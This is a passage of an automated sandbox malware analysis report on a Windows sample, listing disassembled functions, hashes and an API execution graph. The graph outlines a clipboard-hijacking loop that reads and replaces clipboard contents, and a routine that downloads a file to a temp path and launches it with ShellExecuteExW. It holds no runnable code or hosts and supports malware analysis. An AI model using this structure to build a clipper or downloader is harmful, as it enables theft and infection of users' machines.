                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                        • String ID:
                                                        • API String ID: 2059591211-0
                                                        • Opcode ID: 16e91ae191353f76377487b504f8ad98fae09f0c97f906459e9bfe3258fa4ce0
                                                        • Instruction ID: 362f8c605a7aafb6853715ce47dd8b46f99f4b7f4cda487b2a3f009fde50034f
                                                        • Opcode Fuzzy Hash: 16e91ae191353f76377487b504f8ad98fae09f0c97f906459e9bfe3258fa4ce0
                                                        • Instruction Fuzzy Hash: B5F0A031000701DBEB3177A0C81F79A73A0AF00326F14885CF456558A2CFBEA8588A95
                                                        Function 00752858 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Concurrency::critical_section::unlock.LIBCMT ref: 0075285C
                                                          • Part of subcall function 00751AD2: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 00751AF3
                                                          • Part of subcall function 00751AD2: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 00751B2A
                                                          • Part of subcall function 00751AD2: Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00751B36
                                                        • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00752868
                                                          • Part of subcall function 00751443: Concurrency::critical_section::unlock.LIBCMT ref: 00751467
                                                        • Concurrency::Context::Block.LIBCONCRT ref: 0075286D
                                                          • Part of subcall function 00753621: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00753623
                                                        • Concurrency::critical_section::lock.LIBCONCRT ref: 0075288D
                                                          • Part of subcall function 007519FB: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 00751A09
                                                          • Part of subcall function 007519FB: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00751A16
                                                          • Part of subcall function 007519FB: Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 00751A21
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Concurrency::details::LockQueue$NodeNode::$Concurrency::critical_section::_Concurrency::critical_section::unlockNextWait$Acquire_lockBase::BlockConcurrency::Concurrency::critical_section::lockConcurrency::details::_ContextContext::CurrentDerefLock::_ReaderSchedulerScoped_lockScoped_lock::~_Switch_to_activeTimerWriter
                                                        • String ID:
                                                        • API String ID: 3659872527-0
                                                        • Opcode ID: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
                                                        • Instruction ID: d818c1397a0110aa818495b34f7a93f1b0826966fad4bf4c5bbec7f1a0f3c48f
                                                        • Opcode Fuzzy Hash: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
                                                        • Instruction Fuzzy Hash: A1E0D834500401EBCB04FF20C46A5DCBB61BF44313F544249E862032A1CFB86E4ACB81
                                                        Function 00769090 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 117COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 007690C3
                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 0076917C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritable___except_validate_context_record
                                                        • String ID: csm
                                                        • API String ID: 3480331319-1018135373
                                                        • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                        • Instruction ID: 0a2cfc1626ff710f311e5d9f98133197188ddcef0c17be7c920e6f3a8de444e5
                                                        • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                        • Instruction Fuzzy Hash: 52411A74A0020EEBCF14DF28C889A9E7BB9AF45324F248155EE166B392D739DD05CF91
                                                        Function 00752C00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00752C9D
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00752CAB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                        • String ID: ED
                                                        • API String ID: 2172578484-412002901
                                                        • Opcode ID: e08c19642d7b700cf60faa8aebbbf92ec784f63dcc7f1ccf2d9f7600249f9a07
                                                        • Instruction ID: 906774b7c40afbe54b6d814fdb09ed6e1705638555eb135ba111104b057d3370
                                                        • Opcode Fuzzy Hash: e08c19642d7b700cf60faa8aebbbf92ec784f63dcc7f1ccf2d9f7600249f9a07
                                                        • Instruction Fuzzy Hash: 27117375900314ABE7107B756C8EAAB3BAC9906B533240526BC01D3153EEBDD909466C
                                                        Function 0077289A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID: T.exe
                                                        • API String ID: 269201875-3749587449
                                                        • Opcode ID: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                        • Instruction ID: 0e480b1233a54fccd68c33bbe8f0f7d6899eb4ea5bc9dd6aece70731fb1a8518
                                                        • Opcode Fuzzy Hash: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                        • Instruction Fuzzy Hash: 3DF0F935144A00BBCE1533346C0EA1B2619AFC1BF2F258138F92C92193FE6D8D074666
                                                        Function 007703DE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID: C:\Users\user\Desktop\VAIIBIHmtT.exe
                                                        • API String ID: 269201875-3541670631
                                                        • Opcode ID: 74b13d0fcde66366100e3dca1cb45a37efbb8a6426e7ea2b6f327c2869fbdbbd
                                                        • Instruction ID: 9ba264e88c5c002a8bcf8b8cea48326000f2bcb2d4f4a126db8b356c42976843
                                                        • Opcode Fuzzy Hash: 74b13d0fcde66366100e3dca1cb45a37efbb8a6426e7ea2b6f327c2869fbdbbd
                                                        • Instruction Fuzzy Hash: 8CE0E512A05950C1DE3122392C09A5A05009B827B5F11C26AEA2CEA0C3DEAC8C0712DA
                                                        Function 0074E224 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0074E230
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0074E23E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                        • String ID: h|aE
                                                        • API String ID: 1687795959-4167925309
                                                        • Opcode ID: 1af871c79733728879b608123eee771ee8330ea46e828bb1aa2e16d402f1ad07
                                                        • Instruction ID: c6c98b35f47463dcb999ac2c3cf721080d857fc82d534b4c51f2d0f9e5711aa0
                                                        • Opcode Fuzzy Hash: 1af871c79733728879b608123eee771ee8330ea46e828bb1aa2e16d402f1ad07
                                                        • Instruction Fuzzy Hash: 00C0122480020CBBCB04BAA0DC0A98D7739AA04200F904620AA2092092ABF8A2098BC2

                                                        Execution Graph

                                                        Execution Coverage:3.7%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:4.2%
                                                        Total number of Nodes:710
                                                        Total number of Limit Nodes:20
                                                        execution_graph 32308 404bb3 32309 404bbf Concurrency::details::ResourceManager::Shutdown 32308->32309 32314 40fb31 32309->32314 32313 404bdf Concurrency::details::ResourceManager::Shutdown _MallocaArrayHolder 32317 40fb36 32314->32317 32316 404bc8 32322 4051f5 32316->32322 32317->32316 32319 40fb52 Concurrency::SchedulerPolicy::_Initialize 32317->32319 32338 42ad9e 32317->32338 32345 42f470 7 API calls 2 library calls 32317->32345 32346 42862d RaiseException 32319->32346 32321 4103ec 32323 405201 Concurrency::details::ResourceManager::Shutdown __Cnd_init 32322->32323 32326 405219 __Mtx_init 32323->32326 32357 40ce57 28 API calls std::_Throw_Cpp_error 32323->32357 32325 405240 32349 4010ea 32325->32349 32326->32325 32358 40ce57 28 API calls std::_Throw_Cpp_error 32326->32358 32332 40528f 32334 4052a4 _MallocaArrayHolder 32332->32334 32360 401128 28 API calls 2 library calls 32332->32360 32361 401109 32334->32361 32337 4052c9 Concurrency::details::ResourceManager::Shutdown 32337->32313 32343 4336c7 __Toupper 32338->32343 32339 433705 32348 42eae9 20 API calls __dosmaperr 32339->32348 32340 4336f0 RtlAllocateHeap 32342 433703 32340->32342 32340->32343 32342->32317 32343->32339 32343->32340 32347 42f470 7 API calls 2 library calls 32343->32347 32345->32317 32346->32321 32347->32343 32348->32342 32365 40d338 32349->32365 32352 401103 32354 40cf18 32352->32354 32397 42e134 32354->32397 32357->32326 32358->32325 32359 40ce57 28 API calls std::_Throw_Cpp_error 32359->32332 32360->32332 32362 401115 __Mtx_unlock 32361->32362 32363 401122 32362->32363 32727 40ce57 28 API calls std::_Throw_Cpp_error 32362->32727 32363->32337 32369 40d092 32365->32369 32368 40ce57 28 API calls std::_Throw_Cpp_error 32368->32352 32370 40d0e8 32369->32370 32371 40d0ba GetCurrentThreadId 32369->32371 32373 40d112 32370->32373 32374 40d0ec GetCurrentThreadId 32370->32374 32372 40d0c5 GetCurrentThreadId 32371->32372 32383 40d0e0 32371->32383 32372->32383 32375 40d1ab GetCurrentThreadId 32373->32375 32378 40d132 32373->32378 32376 40d0fb 32374->32376 32375->32376 32377 40d202 GetCurrentThreadId 32376->32377 32376->32383 32377->32383 32394 40e954 GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 32378->32394 32382 4010f6 32382->32352 32382->32368 32387 40f8f4 32383->32387 32384 40d16a GetCurrentThreadId 32384->32376 32385 40d13d __Xtime_diff_to_millis2 32384->32385 32385->32376 32385->32383 32385->32384 32395 40e954 GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 32385->32395 32388 40f8fd 32387->32388 32389 40f8ff IsProcessorFeaturePresent 32387->32389 32388->32382 32391 40f972 32389->32391 32396 40f936 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 32391->32396 32393 40fa55 32393->32382 32394->32385 32395->32385 32396->32393 32398 42e141 32397->32398 32399 42e155 32397->32399 32420 42eae9 20 API calls __dosmaperr 32398->32420 32411 42e0eb 32399->32411 32403 42e146 32421 42a5bd 26 API calls _Deallocate 32403->32421 32404 42e16a CreateThread 32406 42e195 32404->32406 32407 42e189 GetLastError 32404->32407 32447 42dfe0 32404->32447 32423 42e05d 32406->32423 32422 42eab3 20 API calls __dosmaperr 32407->32422 32410 40527c 32410->32332 32410->32359 32431 434d4a 32411->32431 32415 42e104 32416 42e123 32415->32416 32417 42e10b GetModuleHandleExW 32415->32417 32418 42e05d __Thrd_start 22 API calls 32416->32418 32417->32416 32419 42e12d 32418->32419 32419->32404 32419->32406 32420->32403 32421->32410 32422->32406 32424 42e06a 32423->32424 32425 42e08e 32423->32425 32426 42e070 CloseHandle 32424->32426 32427 42e079 32424->32427 32425->32410 32426->32427 32428 42e088 32427->32428 32429 42e07f FreeLibrary 32427->32429 32430 43348a _free 20 API calls 32428->32430 32429->32428 32430->32425 32432 434d57 __Toupper 32431->32432 32433 434d97 32432->32433 32434 434d82 RtlAllocateHeap 32432->32434 32444 42f470 7 API calls 2 library calls 32432->32444 32445 42eae9 20 API calls __dosmaperr 32433->32445 32434->32432 32436 42e0fb 32434->32436 32438 43348a 32436->32438 32439 433495 HeapFree 32438->32439 32443 4334be __dosmaperr 32438->32443 32440 4334aa 32439->32440 32439->32443 32446 42eae9 20 API calls __dosmaperr 32440->32446 32442 4334b0 GetLastError 32442->32443 32443->32415 32444->32432 32445->32436 32446->32442 32448 42dfec _Atexit 32447->32448 32449 42dff3 GetLastError ExitThread 32448->32449 32450 42e000 32448->32450 32463 431efa GetLastError 32450->32463 32452 42e005 32483 435591 32452->32483 32456 42e01b 32490 401169 32456->32490 32464 431f10 32463->32464 32465 431f16 32463->32465 32498 435131 11 API calls 2 library calls 32464->32498 32467 434d4a __Toupper 20 API calls 32465->32467 32469 431f65 SetLastError 32465->32469 32468 431f28 32467->32468 32470 431f30 32468->32470 32499 435187 11 API calls 2 library calls 32468->32499 32469->32452 32472 43348a _free 20 API calls 32470->32472 32474 431f36 32472->32474 32473 431f45 32473->32470 32475 431f4c 32473->32475 32476 431f71 SetLastError 32474->32476 32500 431d6c 20 API calls __Toupper 32475->32500 32501 42df9d 167 API calls 2 library calls 32476->32501 32479 431f57 32480 43348a _free 20 API calls 32479->32480 32482 431f5e 32480->32482 32481 431f7d 32482->32469 32482->32476 32484 4355b6 32483->32484 32485 4355ac 32483->32485 32502 434eb3 5 API calls 2 library calls 32484->32502 32487 40f8f4 __ehhandler$?_RunAndWait@_StructuredTaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 5 API calls 32485->32487 32488 42e010 32487->32488 32488->32456 32497 4354c4 10 API calls 2 library calls 32488->32497 32489 4355cd 32489->32485 32503 405825 32490->32503 32516 40155a Sleep 32490->32516 32491 401173 32494 42e1b9 32491->32494 32695 42e094 32494->32695 32496 42e1c6 32497->32456 32498->32465 32499->32473 32500->32479 32501->32481 32502->32489 32504 405831 Concurrency::details::ResourceManager::Shutdown 32503->32504 32505 4010ea std::_Cnd_initX 35 API calls 32504->32505 32506 405846 __Cnd_signal 32505->32506 32507 40585e 32506->32507 32562 40ce57 28 API calls std::_Throw_Cpp_error 32506->32562 32509 401109 std::_Cnd_initX 28 API calls 32507->32509 32510 405867 32509->32510 32518 4016e3 32510->32518 32539 402a14 InternetOpenW 32510->32539 32513 40586e Concurrency::details::ResourceManager::Shutdown _MallocaArrayHolder 32513->32491 32517 4016d9 32516->32517 32563 40fe0b 32518->32563 32520 4016ef Sleep 32564 40cc35 32520->32564 32523 40cc35 28 API calls 32524 401715 32523->32524 32525 40171f OpenClipboard 32524->32525 32526 401947 Sleep 32525->32526 32527 40172f GetClipboardData 32525->32527 32526->32525 32528 401941 CloseClipboard 32527->32528 32529 40173f GlobalLock 32527->32529 32528->32526 32529->32528 32534 40174c _strlen 32529->32534 32530 40cbec 28 API calls std::system_error::system_error 32530->32534 32531 40cc35 28 API calls 32531->32534 32533 4018d6 EmptyClipboard GlobalAlloc 32533->32534 32535 4018ef GlobalLock 32533->32535 32534->32528 32534->32530 32534->32531 32534->32533 32568 402e8b 167 API calls 2 library calls 32534->32568 32570 40cacb 26 API calls _Deallocate 32534->32570 32569 4269b0 32535->32569 32538 401909 GlobalUnlock SetClipboardData GlobalFree 32538->32534 32540 402a47 InternetOpenUrlW 32539->32540 32541 402bbc 32539->32541 32540->32541 32542 402a5d GetTempPathW GetTempFileNameW 32540->32542 32544 40f8f4 __ehhandler$?_RunAndWait@_StructuredTaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 5 API calls 32541->32544 32576 42a8ae 32542->32576 32546 402bcb 32544->32546 32545 402a96 CreateFileW 32547 402bab InternetCloseHandle InternetCloseHandle 32545->32547 32548 402ac8 Concurrency::details::ResourceManager::InitializeRMBuffers 32545->32548 32555 40e790 32546->32555 32547->32541 32549 402ae0 InternetReadFile WriteFile 32548->32549 32550 402b20 CloseHandle 32548->32550 32549->32548 32578 402980 32550->32578 32553 402b4b ShellExecuteExW 32553->32547 32554 402b92 WaitForSingleObject CloseHandle 32553->32554 32554->32547 32686 40df0f 32555->32686 32560 40e835 32560->32513 32561 40e7a7 __Cnd_do_broadcast_at_thread_exit __Mtx_unlock __Cnd_broadcast 32693 40df1b LeaveCriticalSection std::_Lockit::~_Lockit 32561->32693 32562->32507 32563->32520 32565 40cc51 _strlen 32564->32565 32571 40cbec 32565->32571 32567 401708 32567->32523 32568->32534 32569->32538 32570->32534 32572 40cc1f 32571->32572 32574 40cbfb BuildCatchObjectHelperInternal 32571->32574 32575 40cb81 28 API calls 4 library calls 32572->32575 32574->32567 32575->32574 32577 42a8bf 32576->32577 32577->32545 32577->32577 32579 4029ab _wcslen Concurrency::details::ResourceManager::InitializeRMBuffers 32578->32579 32588 42b474 32579->32588 32584 4029d8 32610 404358 32584->32610 32586 40f8f4 __ehhandler$?_RunAndWait@_StructuredTaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 5 API calls 32587 402a12 32586->32587 32587->32547 32587->32553 32614 42b126 32588->32614 32591 402843 32592 402852 Concurrency::details::ResourceManager::Shutdown 32591->32592 32640 403302 32592->32640 32594 402866 32656 403bb0 32594->32656 32596 40287a 32597 4028a8 32596->32597 32598 40288c 32596->32598 32662 403137 32597->32662 32683 4032bf 167 API calls 32598->32683 32601 4028b5 32665 403c45 32601->32665 32603 4028c7 32675 403ce7 32603->32675 32605 4028e4 32606 404358 26 API calls 32605->32606 32607 402903 32606->32607 32684 4032bf 167 API calls 32607->32684 32609 40289f std::ios_base::_Ios_base_dtor Concurrency::details::ResourceManager::Shutdown 32609->32584 32611 404360 32610->32611 32612 402a04 32610->32612 32685 40ccbb 26 API calls 2 library calls 32611->32685 32612->32586 32615 42b153 32614->32615 32616 42b157 32615->32616 32617 42b162 32615->32617 32618 42b17a 32615->32618 32621 40f8f4 __ehhandler$?_RunAndWait@_StructuredTaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 5 API calls 32616->32621 32619 42eae9 __dosmaperr 20 API calls 32617->32619 32620 42a767 __fassign 162 API calls 32618->32620 32622 42b167 32619->32622 32623 42b185 32620->32623 32624 4029c4 32621->32624 32625 42a5bd __wsopen_s 26 API calls 32622->32625 32626 42b190 32623->32626 32627 42b327 32623->32627 32624->32591 32625->32616 32629 42b238 WideCharToMultiByte 32626->32629 32631 42b1d5 WideCharToMultiByte 32626->32631 32635 42b19b 32626->32635 32628 42b354 WideCharToMultiByte 32627->32628 32630 42b332 32627->32630 32628->32630 32633 42b263 32629->32633 32629->32635 32630->32616 32634 42eae9 __dosmaperr 20 API calls 32630->32634 32631->32635 32633->32635 32636 42b26c GetLastError 32633->32636 32634->32616 32635->32616 32637 42eae9 __dosmaperr 20 API calls 32635->32637 32636->32635 32639 42b27b 32636->32639 32637->32616 32638 42b294 WideCharToMultiByte 32638->32630 32638->32639 32639->32616 32639->32630 32639->32638 32641 40330e Concurrency::details::ResourceManager::Shutdown 32640->32641 32642 4046a1 167 API calls 32641->32642 32643 40333a 32642->32643 32644 404872 167 API calls 32643->32644 32645 403363 32644->32645 32646 4045b1 26 API calls 32645->32646 32647 403372 32646->32647 32648 40de08 167 API calls 32647->32648 32655 4033b7 std::ios_base::_Ios_base_dtor 32647->32655 32650 403387 32648->32650 32649 4033f3 Concurrency::details::ResourceManager::Shutdown 32649->32594 32652 4045b1 26 API calls 32650->32652 32650->32655 32651 40c63d 167 API calls 32651->32649 32653 403398 32652->32653 32654 404c39 167 API calls 32653->32654 32654->32655 32655->32649 32655->32651 32657 403bbc Concurrency::details::ResourceManager::Shutdown 32656->32657 32658 4042d4 167 API calls 32657->32658 32659 403bc8 32658->32659 32660 403bec Concurrency::details::ResourceManager::Shutdown 32659->32660 32661 403520 167 API calls 32659->32661 32660->32596 32661->32660 32663 40437b 28 API calls 32662->32663 32664 403151 Concurrency::details::ResourceManager::InitializeRMBuffers 32663->32664 32664->32601 32666 403c51 Concurrency::details::ResourceManager::Shutdown 32665->32666 32667 40c63d 167 API calls 32666->32667 32668 403c74 32667->32668 32669 4042d4 167 API calls 32668->32669 32670 403c7e 32669->32670 32672 403cc1 Concurrency::details::ResourceManager::Shutdown 32670->32672 32674 403520 167 API calls 32670->32674 32671 403c9f 32671->32672 32673 4046ef 167 API calls 32671->32673 32672->32603 32673->32672 32674->32671 32676 403cf3 __EH_prolog3_catch 32675->32676 32677 4042d4 167 API calls 32676->32677 32679 403d0c 32677->32679 32678 4046ef 167 API calls 32681 403d95 Concurrency::details::ResourceManager::Shutdown 32678->32681 32680 403d3c 32679->32680 32682 4036c4 40 API calls 32679->32682 32680->32678 32681->32605 32682->32680 32683->32609 32684->32609 32685->32612 32694 40f24f EnterCriticalSection 32686->32694 32688 40df19 32689 40cebe GetCurrentProcess GetCurrentThread GetCurrentProcess DuplicateHandle 32688->32689 32690 40cef7 32689->32690 32691 40ceec CloseHandle 32689->32691 32692 40cefb GetCurrentThreadId 32690->32692 32691->32692 32692->32561 32693->32560 32694->32688 32704 431f7e GetLastError 32695->32704 32697 42e0a3 ExitThread 32698 42e0c1 32700 42e0d4 32698->32700 32702 42e0cd CloseHandle 32698->32702 32700->32697 32703 42e0e0 FreeLibraryAndExitThread 32700->32703 32702->32700 32705 431f9d 32704->32705 32706 431f97 32704->32706 32708 434d4a __Toupper 17 API calls 32705->32708 32710 431ff4 SetLastError 32705->32710 32724 435131 11 API calls 2 library calls 32706->32724 32709 431faf 32708->32709 32711 431fb7 32709->32711 32725 435187 11 API calls 2 library calls 32709->32725 32713 42e09f 32710->32713 32715 43348a _free 17 API calls 32711->32715 32713->32697 32713->32698 32723 435516 10 API calls 2 library calls 32713->32723 32714 431fcc 32714->32711 32716 431fd3 32714->32716 32717 431fbd 32715->32717 32726 431d6c 20 API calls __Toupper 32716->32726 32719 431feb SetLastError 32717->32719 32719->32713 32720 431fde 32721 43348a _free 17 API calls 32720->32721 32722 431fe4 32721->32722 32722->32710 32722->32719 32723->32698 32724->32705 32725->32714 32726->32720 32727->32363 32728 402c24 InternetOpenW 32729 402e7a 32728->32729 32732 402c57 Concurrency::details::ResourceManager::InitializeRMBuffers 32728->32732 32730 40f8f4 __ehhandler$?_RunAndWait@_StructuredTaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 5 API calls 32729->32730 32731 402e89 32730->32731 32740 42df1d 32732->32740 32735 42df1d std::_Locinfo::_Locinfo_ctor 26 API calls 32736 402e3c 32735->32736 32737 42df1d std::_Locinfo::_Locinfo_ctor 26 API calls 32736->32737 32738 402e4e InternetOpenUrlW 32737->32738 32738->32729 32739 402e69 InternetCloseHandle InternetCloseHandle 32738->32739 32739->32729 32741 42df3a 32740->32741 32743 42df2c 32740->32743 32749 42eae9 20 API calls __dosmaperr 32741->32749 32743->32741 32746 42df6a 32743->32746 32745 402e2e 32745->32735 32746->32745 32751 42eae9 20 API calls __dosmaperr 32746->32751 32748 42df44 32750 42a5bd 26 API calls _Deallocate 32748->32750 32749->32748 32750->32745 32751->32748 32752 4327a5 32757 432573 32752->32757 32755 4327cd 32762 43259e 32757->32762 32759 432791 32776 42a5bd 26 API calls _Deallocate 32759->32776 32761 4326f0 32761->32755 32769 43d03c 32761->32769 32765 4326e7 32762->32765 32772 43c8ee 170 API calls 2 library calls 32762->32772 32764 432731 32764->32765 32773 43c8ee 170 API calls 2 library calls 32764->32773 32765->32761 32775 42eae9 20 API calls __dosmaperr 32765->32775 32767 432750 32767->32765 32774 43c8ee 170 API calls 2 library calls 32767->32774 32777 43ca11 32769->32777 32771 43d057 32771->32755 32772->32764 32773->32767 32774->32765 32775->32759 32776->32761 32779 43ca1d __FrameHandler3::FrameUnwindToState 32777->32779 32778 43ca2b 32795 42eae9 20 API calls __dosmaperr 32778->32795 32779->32778 32781 43ca64 32779->32781 32788 43cfeb 32781->32788 32782 43ca30 32796 42a5bd 26 API calls _Deallocate 32782->32796 32787 43ca3a __wsopen_s 32787->32771 32798 43f961 32788->32798 32791 43ca88 32797 43cab1 LeaveCriticalSection __wsopen_s 32791->32797 32794 43348a _free 20 API calls 32794->32791 32795->32782 32796->32787 32797->32787 32799 43f984 32798->32799 32800 43f96d 32798->32800 32802 43f9a3 32799->32802 32803 43f98c 32799->32803 32868 42eae9 20 API calls __dosmaperr 32800->32868 32872 434fca 10 API calls 2 library calls 32802->32872 32870 42eae9 20 API calls __dosmaperr 32803->32870 32805 43f972 32869 42a5bd 26 API calls _Deallocate 32805->32869 32807 43f9aa MultiByteToWideChar 32810 43f9d9 32807->32810 32811 43f9c9 GetLastError 32807->32811 32809 43f991 32871 42a5bd 26 API calls _Deallocate 32809->32871 32874 4336c7 21 API calls 3 library calls 32810->32874 32873 42eab3 20 API calls __dosmaperr 32811->32873 32815 43d001 32815->32791 32822 43d05c 32815->32822 32816 43f9e1 32817 43fa09 32816->32817 32818 43f9e8 MultiByteToWideChar 32816->32818 32820 43348a _free 20 API calls 32817->32820 32818->32817 32819 43f9fd GetLastError 32818->32819 32875 42eab3 20 API calls __dosmaperr 32819->32875 32820->32815 32823 43d079 32822->32823 32824 43d0a7 32823->32824 32825 43d08e 32823->32825 32876 43979e 32824->32876 32890 42ead6 20 API calls __dosmaperr 32825->32890 32828 43d0ac 32829 43d0b5 32828->32829 32830 43d0cc 32828->32830 32892 42ead6 20 API calls __dosmaperr 32829->32892 32889 43cd2a CreateFileW 32830->32889 32834 43d0ba 32893 42eae9 20 API calls __dosmaperr 32834->32893 32835 43d182 GetFileType 32840 43d1d4 32835->32840 32841 43d18d GetLastError 32835->32841 32836 43d029 32836->32794 32838 43d105 32838->32835 32839 43d157 GetLastError 32838->32839 32894 43cd2a CreateFileW 32838->32894 32895 42eab3 20 API calls __dosmaperr 32839->32895 32898 4396e7 21 API calls 2 library calls 32840->32898 32896 42eab3 20 API calls __dosmaperr 32841->32896 32842 43d093 32891 42eae9 20 API calls __dosmaperr 32842->32891 32846 43d19b CloseHandle 32846->32842 32849 43d1c4 32846->32849 32848 43d14a 32848->32835 32848->32839 32897 42eae9 20 API calls __dosmaperr 32849->32897 32851 43d1f5 32853 43d241 32851->32853 32899 43cf3b 169 API calls 3 library calls 32851->32899 32852 43d1c9 32852->32842 32857 43d26e 32853->32857 32900 43cadd 167 API calls 4 library calls 32853->32900 32856 43d267 32856->32857 32858 43d27f 32856->32858 32901 4335ed 29 API calls 2 library calls 32857->32901 32858->32836 32860 43d2fd CloseHandle 32858->32860 32902 43cd2a CreateFileW 32860->32902 32862 43d328 32863 43d332 GetLastError 32862->32863 32867 43d277 32862->32867 32903 42eab3 20 API calls __dosmaperr 32863->32903 32865 43d33e 32904 4398b0 21 API calls 2 library calls 32865->32904 32867->32836 32868->32805 32869->32815 32870->32809 32871->32815 32872->32807 32873->32815 32874->32816 32875->32817 32877 4397aa __FrameHandler3::FrameUnwindToState 32876->32877 32905 42e40d EnterCriticalSection 32877->32905 32879 4397f8 32906 4398a7 32879->32906 32880 4397d6 32909 43957d 21 API calls 3 library calls 32880->32909 32881 4397b1 32881->32879 32881->32880 32886 439844 EnterCriticalSection 32881->32886 32884 439821 __wsopen_s 32884->32828 32885 4397db 32885->32879 32910 4396c4 EnterCriticalSection 32885->32910 32886->32879 32887 439851 LeaveCriticalSection 32886->32887 32887->32881 32889->32838 32890->32842 32891->32836 32892->32834 32893->32842 32894->32848 32895->32842 32896->32846 32897->32852 32898->32851 32899->32853 32900->32856 32901->32867 32902->32862 32903->32865 32904->32867 32905->32881 32911 42e455 LeaveCriticalSection 32906->32911 32908 4398ae 32908->32884 32909->32885 32910->32879 32911->32908 32912 43412a 32913 434136 __FrameHandler3::FrameUnwindToState 32912->32913 32914 434142 32913->32914 32915 434159 32913->32915 32946 42eae9 20 API calls __dosmaperr 32914->32946 32925 42cb1f EnterCriticalSection 32915->32925 32918 434169 32926 4341a6 32918->32926 32919 434147 32947 42a5bd 26 API calls _Deallocate 32919->32947 32922 434175 32948 43419c LeaveCriticalSection __fread_nolock 32922->32948 32924 434152 __wsopen_s 32925->32918 32927 4341b4 32926->32927 32928 4341ce 32926->32928 32959 42eae9 20 API calls __dosmaperr 32927->32959 32949 432928 